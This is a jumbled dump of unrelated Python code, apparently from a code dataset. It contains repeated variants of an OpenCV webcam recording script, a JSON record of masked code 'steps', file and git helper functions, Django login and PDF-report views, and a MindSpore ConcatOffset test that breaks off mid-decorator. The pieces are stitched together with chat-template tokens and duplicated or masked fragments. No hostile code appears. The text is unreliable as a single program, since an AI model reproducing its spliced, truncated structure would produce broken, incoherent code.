videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print('Live Video Done.')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
video_path = 0
if type(video_path).__name__ == 'str':
videoReader = cv2.VideoCapture(video_path)
print('Load live video from file...')
elif type(video_path).__name__ == 'int':
videoReader = cv2.VideoCapture(video_path)
print('Get live video from camera...')
if videoReader.isOpened():
print('Camera staus ready...')
else:
print('Camera status fault...')
exit()
video_fps = videoReader.get(cv2.CAP_PROP_FPS)
print('Live Video FPS: ', video_fps)
video_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)
video_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)
video_size = int(video_width), int(video_height)
print('Live Video Size: ', video_size)
videoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',
'4', '2'), int(video_fps), video_size)
while videoReader.isOpened():
success, frame = videoReader.read()
if success:
print('Live Video Frame Shape: {}'.format(frame.shape))
cv2.putText(frame, 'Live Camera', (470, 30), cv2.
FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)
cv2.namedWindow('Live Video', 0)
cv2.imshow('Live Video', frame)
videoWriter.write(frame)
cv2.waitKey(20)
if cv2.waitKey(1) & 255 == ord('q'):
break
else:
continue
videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print('Live Video Done.')
<|reserved_special_token_1|>
# Live-video capture script: preview camera (or file) frames and save them
# to ./save.avi until 'q' is pressed.
import sys, os
import cv2
video_path = 0  # int selects a camera index; a str would be a file path
if type(video_path).__name__ == 'str':
    videoReader = cv2.VideoCapture(video_path)
    print('Load live video from file...')
elif type(video_path).__name__ == 'int':
    videoReader = cv2.VideoCapture(video_path)
    print('Get live video from camera...')
# Abort immediately if the capture device could not be opened.
if videoReader.isOpened():
    print('Camera staus ready...')
else:
    print('Camera status fault...')
    exit()
# Query the source's frame rate and size so the writer matches the input.
video_fps = videoReader.get(cv2.CAP_PROP_FPS)
print('Live Video FPS: ', video_fps)
video_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)
video_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)
video_size = int(video_width), int(video_height)
print('Live Video Size: ', video_size)
# Writer for ./save.avi using the MP42 fourcc codec.
videoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',
    '4', '2'), int(video_fps), video_size)
# Main loop: read, overlay a caption, preview, and persist each frame.
while videoReader.isOpened():
    success, frame = videoReader.read()
    if success:
        print('Live Video Frame Shape: {}'.format(frame.shape))
        cv2.putText(frame, 'Live Camera', (470, 30), cv2.
            FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)
        cv2.namedWindow('Live Video', 0)
        cv2.imshow('Live Video', frame)
        videoWriter.write(frame)
        # NOTE(review): the key pressed during waitKey(20) is consumed there,
        # so the waitKey(1) 'q' check below can miss presses — confirm intent.
        cv2.waitKey(20)
        if cv2.waitKey(1) & 255 == ord('q'):
            break
    else:
        # NOTE(review): a failed read loops forever (e.g. at file EOF) —
        # confirm whether `break` is intended here.
        continue
# Release resources and close the preview window.
videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print('Live Video Done.')
print('Live Video Done.')
<|reserved_special_token_1|>
# Capture live video (webcam or file) with OpenCV, overlay a caption,
# preview each frame, and record the stream to ./save.avi ('q' quits).
import sys, os
import cv2
# set the video reader
video_path = 0 # camera number index
# video_path = "/home/pacific/Documents/Work/Projects/Workflows/server/PycharmProjects/Pacific_AvatarGame_Host/humanpose_2d/LiveCamera/test.mp4" # real video file
if type(video_path).__name__ == "str":
    videoReader = cv2.VideoCapture(video_path)
    print("Load live video from file...")
elif type(video_path).__name__ == "int":
    videoReader = cv2.VideoCapture(video_path)
    print("Get live video from camera...")
# bail out early if the capture device could not be opened
if videoReader.isOpened():
    print("Camera staus ready...")
else:
    print("Camera status fault...")
    exit()
# stream properties are reported by OpenCV as floats
video_fps = videoReader.get(cv2.CAP_PROP_FPS)
print("Live Video FPS: ", video_fps)
video_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)
video_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)
video_size = (int(video_width), int(video_height))
print("Live Video Size: ", video_size)
# set the video writer (MP42 = MPEG-4 v2 codec; size must match written frames)
videoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P', '4', '2'), int(video_fps), video_size)
# read and write the video frame
while videoReader.isOpened():
    success, frame = videoReader.read()
    if success:
        # show the video frame (caption drawn in yellow near top-right)
        print("Live Video Frame Shape: {}".format(frame.shape))
        cv2.putText(frame, "Live Camera", (470,30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2)
        cv2.namedWindow("Live Video", 0)
        cv2.imshow("Live Video", frame)
        # save the video frame
        videoWriter.write(frame)
        cv2.waitKey(20) # wait 20 ms for next frame of the live video
        # check whether manual exit command entered
        # NOTE(review): this is a second waitKey call per frame (~21 ms total pause)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    else:
        # dropped/failed frame: keep polling rather than exiting
        continue
# release handles and close the preview window
videoReader.release()
videoWriter.release()
cv2.destroyAllWindows()
print("Live Video Done.")
|
flexible
|
{
"blob_id": "08408cf096bbe23f9a832cc0cf2e017abdbd359f",
"index": 4591,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif type(video_path).__name__ == 'str':\n videoReader = cv2.VideoCapture(video_path)\n print('Load live video from file...')\nelif type(video_path).__name__ == 'int':\n videoReader = cv2.VideoCapture(video_path)\n print('Get live video from camera...')\nif videoReader.isOpened():\n print('Camera staus ready...')\nelse:\n print('Camera status fault...')\n exit()\n<mask token>\nprint('Live Video FPS: ', video_fps)\n<mask token>\nprint('Live Video Size: ', video_size)\n<mask token>\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n print('Live Video Frame Shape: {}'.format(frame.shape))\n cv2.putText(frame, 'Live Camera', (470, 30), cv2.\n FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)\n cv2.namedWindow('Live Video', 0)\n cv2.imshow('Live Video', frame)\n videoWriter.write(frame)\n cv2.waitKey(20)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n continue\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint('Live Video Done.')\n",
"step-3": "<mask token>\nvideo_path = 0\nif type(video_path).__name__ == 'str':\n videoReader = cv2.VideoCapture(video_path)\n print('Load live video from file...')\nelif type(video_path).__name__ == 'int':\n videoReader = cv2.VideoCapture(video_path)\n print('Get live video from camera...')\nif videoReader.isOpened():\n print('Camera staus ready...')\nelse:\n print('Camera status fault...')\n exit()\nvideo_fps = videoReader.get(cv2.CAP_PROP_FPS)\nprint('Live Video FPS: ', video_fps)\nvideo_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)\nvideo_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)\nvideo_size = int(video_width), int(video_height)\nprint('Live Video Size: ', video_size)\nvideoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',\n '4', '2'), int(video_fps), video_size)\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n print('Live Video Frame Shape: {}'.format(frame.shape))\n cv2.putText(frame, 'Live Camera', (470, 30), cv2.\n FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)\n cv2.namedWindow('Live Video', 0)\n cv2.imshow('Live Video', frame)\n videoWriter.write(frame)\n cv2.waitKey(20)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n continue\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint('Live Video Done.')\n",
"step-4": "import sys, os\nimport cv2\nvideo_path = 0\nif type(video_path).__name__ == 'str':\n videoReader = cv2.VideoCapture(video_path)\n print('Load live video from file...')\nelif type(video_path).__name__ == 'int':\n videoReader = cv2.VideoCapture(video_path)\n print('Get live video from camera...')\nif videoReader.isOpened():\n print('Camera staus ready...')\nelse:\n print('Camera status fault...')\n exit()\nvideo_fps = videoReader.get(cv2.CAP_PROP_FPS)\nprint('Live Video FPS: ', video_fps)\nvideo_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)\nvideo_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)\nvideo_size = int(video_width), int(video_height)\nprint('Live Video Size: ', video_size)\nvideoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P',\n '4', '2'), int(video_fps), video_size)\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n print('Live Video Frame Shape: {}'.format(frame.shape))\n cv2.putText(frame, 'Live Camera', (470, 30), cv2.\n FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)\n cv2.namedWindow('Live Video', 0)\n cv2.imshow('Live Video', frame)\n videoWriter.write(frame)\n cv2.waitKey(20)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n continue\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint('Live Video Done.')\n",
"step-5": "import sys, os\nimport cv2\n\n\n# set the video reader\nvideo_path = 0 # camera number index\n# video_path = \"/home/pacific/Documents/Work/Projects/Workflows/server/PycharmProjects/Pacific_AvatarGame_Host/humanpose_2d/LiveCamera/test.mp4\" # real video file\nif type(video_path).__name__ == \"str\":\n videoReader = cv2.VideoCapture(video_path)\n print(\"Load live video from file...\")\nelif type(video_path).__name__ == \"int\":\n videoReader = cv2.VideoCapture(video_path)\n print(\"Get live video from camera...\")\n\nif videoReader.isOpened():\n print(\"Camera staus ready...\")\nelse:\n print(\"Camera status fault...\")\n exit()\n\nvideo_fps = videoReader.get(cv2.CAP_PROP_FPS)\nprint(\"Live Video FPS: \", video_fps)\n\nvideo_width = videoReader.get(cv2.CAP_PROP_FRAME_WIDTH)\nvideo_height = videoReader.get(cv2.CAP_PROP_FRAME_HEIGHT)\nvideo_size = (int(video_width), int(video_height))\nprint(\"Live Video Size: \", video_size)\n\n# set the video writer\nvideoWriter = cv2.VideoWriter('./save.avi', cv2.VideoWriter_fourcc('M', 'P', '4', '2'), int(video_fps), video_size)\n\n# read and write the video frame\nwhile videoReader.isOpened():\n success, frame = videoReader.read()\n if success:\n # show the video frame\n print(\"Live Video Frame Shape: {}\".format(frame.shape))\n cv2.putText(frame, \"Live Camera\", (470,30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2)\n cv2.namedWindow(\"Live Video\", 0)\n cv2.imshow(\"Live Video\", frame)\n\n # save the video frame\n videoWriter.write(frame)\n cv2.waitKey(20) # wait 20 ms for next frame of the live video\n\n # check whether manual exit command entered\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n continue\n\nvideoReader.release()\nvideoWriter.release()\ncv2.destroyAllWindows()\nprint(\"Live Video Done.\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import json
def load_json_if_exists(path):
if not os.path.isfile(path):
return {}
with open(path) as f:
return json.load(f)
def json_dump(obj, file_path):
with open(file_path, 'w') as f:
json.dump(obj, f)
def get_folder_paths(directory):
return [os.path.join(directory, f) for f in os.listdir(directory) if os.path.isdir(os.path.join(directory, f))]
def file_to_lines(file_path):
if len(file_path) == 0:
return []
with open(file_path) as f:
lines = list(f.read().splitlines())
return lines
def get_repo_path(file_path):
if os.path.isfile(file_path):
folder_path = os.path.abspath(os.path.join(file_path, os.pardir))
else:
folder_path = file_path
for i in range(100):
if folder_path == '/':
return None
if is_repo_path(folder_path):
break
folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))
return folder_path
def is_repo_path(path):
return os.path.isdir(path) and '.git' in os.listdir(path)
class LineNumberTracker:
'''
When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,
'''
def __init__(self):
self._log = []
def transform(self, line_num):
for is_add, start, end in self._log:
if line_num < start:
pass
elif line_num < end and not is_add:
assert False, 'Line Deleted: {} {}'.format(line_num, self._log)
else:
if is_add:
line_num += (end - start)
else:
line_num -= (end - start)
return line_num
def remove_lines(self, start, end):
self._log.append((False, start, end))
def add_lines(self, start, end):
self._log.append((True, start, end))
|
normal
|
{
"blob_id": "3788888a17e2598e781803f89cd63ac9c3219f59",
"index": 4341,
"step-1": "<mask token>\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\n<mask token>\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\n<mask token>\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-2": "<mask token>\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\n<mask token>\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-3": "<mask token>\n\n\ndef load_json_if_exists(path):\n if not os.path.isfile(path):\n return {}\n with open(path) as f:\n return json.load(f)\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\ndef get_folder_paths(directory):\n return [os.path.join(directory, f) for f in os.listdir(directory) if os\n .path.isdir(os.path.join(directory, f))]\n\n\ndef file_to_lines(file_path):\n if len(file_path) == 0:\n return []\n with open(file_path) as f:\n lines = list(f.read().splitlines())\n return lines\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-4": "import os\nimport json\n\n\ndef load_json_if_exists(path):\n if not os.path.isfile(path):\n return {}\n with open(path) as f:\n return json.load(f)\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\ndef get_folder_paths(directory):\n return [os.path.join(directory, f) for f in os.listdir(directory) if os\n .path.isdir(os.path.join(directory, f))]\n\n\ndef file_to_lines(file_path):\n if len(file_path) == 0:\n return []\n with open(file_path) as f:\n lines = list(f.read().splitlines())\n return lines\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-5": "import os\nimport json\n\n\ndef load_json_if_exists(path):\n if not os.path.isfile(path):\n return {}\n with open(path) as f:\n return json.load(f)\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\ndef get_folder_paths(directory):\n return [os.path.join(directory, f) for f in os.listdir(directory) if os.path.isdir(os.path.join(directory, f))]\n\n\ndef file_to_lines(file_path):\n if len(file_path) == 0:\n return []\n with open(file_path) as f:\n lines = list(f.read().splitlines())\n return lines\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\nclass LineNumberTracker:\n '''\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n '''\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n else:\n if is_add:\n line_num += (end - start)\n else:\n line_num -= (end - start)\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n\n\n",
"step-ids": [
8,
9,
12,
13,
14
]
}
|
[
8,
9,
12,
13,
14
] |
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponse
# Create your views here.
def check(request):
    """Entry redirect: anonymous users go to the login page, others to the worker page."""
    destination = '/worker/' if request.user.is_authenticated else '/auth/login/'
    return redirect(destination)
def loginpg(request):
    """Render the login form page."""
    return render(request, 'registration/login.html')
def logoutpg(request):
    """Log the current user out and render the logout confirmation page."""
    logout(request)
    return render(request, 'registration/logout.html')
def auth(request):
    """Authenticate the POSTed credentials and log the user in.

    Redirects to the worker page on success; re-renders the error page on
    failure. Uses ``.get()`` so a request missing either form field is
    treated as a failed login instead of raising MultiValueDictKeyError
    (which would surface as an HTTP 500).
    """
    username = request.POST.get('username')
    password = request.POST.get('password')
    # authenticate() returns None for bad or missing credentials.
    user = authenticate(request, username=username, password=password)
    if user is not None:
        login(request, user)
        return redirect('/worker/')
    return render(request, 'registration/login_error.html')
|
normal
|
{
"blob_id": "fc2afc99dc754b58c36bc76c723727337851cc3e",
"index": 5326,
"step-1": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-3": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-4": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n# Create your views here.\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request) \n return render(request, 'registration/logout.html')\n\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
import json
from django.conf import settings
from pdf_generator.utils import build_pdf_stream_from
from django.http import JsonResponse
from helpers.views import ApiView
from pdf_generator.forms import PdfTempStoreForm
from pdf_generator.serializers import PdfTempStoreSerializer
class ReportPdfView(ApiView):
    """
    API endpoint that renders an interview-report PDF.

    POST body (JSON): ``{"domain": <public hostname>, "data": <report payload>}``.
    The payload is persisted in a temporary store, the report page identified
    by the store's UUID is rendered to PDF, and the temporary record is
    deleted afterwards.
    """

    def post(self, request, *args, **kwargs):
        """Build and return the report PDF stream for the posted payload."""
        data = json.loads(request.body)
        domain = data["domain"]
        data = data["data"]

        print("-- Build Report PDF Export --")
        print()

        # persist params in PdfTemp so the rendered page can fetch them by UUID
        store = PdfTempStoreForm({"data": data})
        if store.is_valid():
            store_instance = store.save()
        else:
            return JsonResponse({"error": "Pdf data is invalid"})

        uuid = PdfTempStoreSerializer(store_instance).data["uuid"]
        # NOTE(review): 'nginx' looks like the internal hostname the PDF
        # renderer resolves, while `domain` only parametrizes links inside
        # the rendered page — confirm against deployment.
        url = (
            f"http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}"
        )
        # Early display pdf URL (with the public domain substituted) for debugging
        if settings.DEBUG:
            print(
                "================================================================================"
            )
            print(url.replace("nginx", domain))
            print(
                "================================================================================"
            )

        pdf = build_pdf_stream_from(url)
        # the temp record is single-use: drop it once the PDF is rendered
        store_instance.delete()

        return pdf
|
normal
|
{
"blob_id": "789f95095346262a04e7de0f9f9c5df6177e8fbc",
"index": 5114,
"step-1": "<mask token>\n\n\nclass ReportPdfView(ApiView):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ReportPdfView(ApiView):\n <mask token>\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data['domain']\n data = data['data']\n print('-- Build Report PDF Export --')\n print()\n store = PdfTempStoreForm({'data': data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({'error': 'Pdf data is invalid'})\n uuid = PdfTempStoreSerializer(store_instance).data['uuid']\n url = (\n f'http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}'\n )\n if settings.DEBUG:\n print(\n '================================================================================'\n )\n print(url.replace('nginx', domain))\n print(\n '================================================================================'\n )\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n return pdf\n",
"step-3": "<mask token>\n\n\nclass ReportPdfView(ApiView):\n \"\"\"\n PdfView\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data['domain']\n data = data['data']\n print('-- Build Report PDF Export --')\n print()\n store = PdfTempStoreForm({'data': data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({'error': 'Pdf data is invalid'})\n uuid = PdfTempStoreSerializer(store_instance).data['uuid']\n url = (\n f'http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}'\n )\n if settings.DEBUG:\n print(\n '================================================================================'\n )\n print(url.replace('nginx', domain))\n print(\n '================================================================================'\n )\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n return pdf\n",
"step-4": "import json\nfrom django.conf import settings\nfrom pdf_generator.utils import build_pdf_stream_from\nfrom django.http import JsonResponse\nfrom helpers.views import ApiView\nfrom pdf_generator.forms import PdfTempStoreForm\nfrom pdf_generator.serializers import PdfTempStoreSerializer\n\n\nclass ReportPdfView(ApiView):\n \"\"\"\n PdfView\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data['domain']\n data = data['data']\n print('-- Build Report PDF Export --')\n print()\n store = PdfTempStoreForm({'data': data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({'error': 'Pdf data is invalid'})\n uuid = PdfTempStoreSerializer(store_instance).data['uuid']\n url = (\n f'http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}'\n )\n if settings.DEBUG:\n print(\n '================================================================================'\n )\n print(url.replace('nginx', domain))\n print(\n '================================================================================'\n )\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n return pdf\n",
"step-5": "# -*- coding: utf-8 -*-\nimport json\nfrom django.conf import settings\nfrom pdf_generator.utils import build_pdf_stream_from\nfrom django.http import JsonResponse\n\nfrom helpers.views import ApiView\n\nfrom pdf_generator.forms import PdfTempStoreForm\nfrom pdf_generator.serializers import PdfTempStoreSerializer\n\n\nclass ReportPdfView(ApiView):\n \"\"\"\n PdfView\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data[\"domain\"]\n data = data[\"data\"]\n\n print(\"-- Build Report PDF Export --\")\n print()\n\n # persist params in PdfTemp\n store = PdfTempStoreForm({\"data\": data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({\"error\": \"Pdf data is invalid\"})\n\n uuid = PdfTempStoreSerializer(store_instance).data[\"uuid\"]\n url = (\n f\"http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}\"\n )\n # Early display pdf URL\n if settings.DEBUG:\n print(\n \"================================================================================\"\n )\n print(url.replace(\"nginx\", domain))\n print(\n \"================================================================================\"\n )\n\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n\n return pdf\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore
import mindspore.nn as nn
from mindspore.ops.operations import _grad_ops as G
from mindspore import Tensor, context
class ConcatOffsetNet(nn.Cell):
    """Network wrapping G.ConcatOffset for two inputs joined along `axis`."""

    def __init__(self, axis):
        super(ConcatOffsetNet, self).__init__()
        # First argument (2) is the number of tensors being concatenated.
        self.op = G.ConcatOffset(2, axis)

    def construct(self, x0, x1):
        # Return each input's start offset within the concatenated output.
        return self.op((x0, x1))
def run_case(run_mode):
    """Run the dynamic-shape ConcatOffset case under the given execution mode."""
    context.set_context(mode=run_mode)
    # Two inputs that differ only along the concat axis (axis=1): 2 vs. 6 rows.
    x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))
    x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))
    # Expected per-input offsets along every dimension:
    # x0 starts at [0, 0, 0]; x1 starts at index 2 on axis 1.
    expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)
    # Dynamic shapes on the first two dims force a runtime offset computation.
    x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)
    x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)
    net = ConcatOffsetNet(1)
    net.set_inputs(x0_dyn, x1_dyn)
    output = net(x0, x1)
    if run_mode == context.GRAPH_MODE:
        assert np.allclose(expect, output.asnumpy())
    else:
        # In PyNative, set_inputs will be ignored. Static shape for ConcatOffset
        # infer output is not a tensor, get constant value output.
        assert np.allclose(expect, output)
@pytest.mark.level0
@pytest.mark.env_onecard
